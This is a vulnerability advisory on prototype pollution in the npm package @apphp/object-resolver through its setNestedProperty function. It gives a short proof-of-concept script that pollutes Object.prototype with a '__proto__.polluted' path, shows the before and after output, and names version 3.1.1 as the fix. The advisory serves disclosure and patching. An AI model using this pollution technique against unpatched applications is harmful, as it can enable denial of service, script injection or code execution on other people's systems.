All versions of this module are vulnerable to Prototype Pollution via Module.setNestedProperty (@apphp/object-resolver/dist/object-resolver.js:243)
. The user's supplied value recursively copy all child properties to the destination without proper security validation.
An attacker can be exploit this method to inject malicious payload via built-in Object
through the special properties __proto__
or constructor.prototype
.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
(async () => {
const lib = await import('@apphp/object-resolver');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
lib.setNestedProperty ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Expected output after the patch:
Before Attack: {}
After Attack: {}
Update to fixed version 3.1.1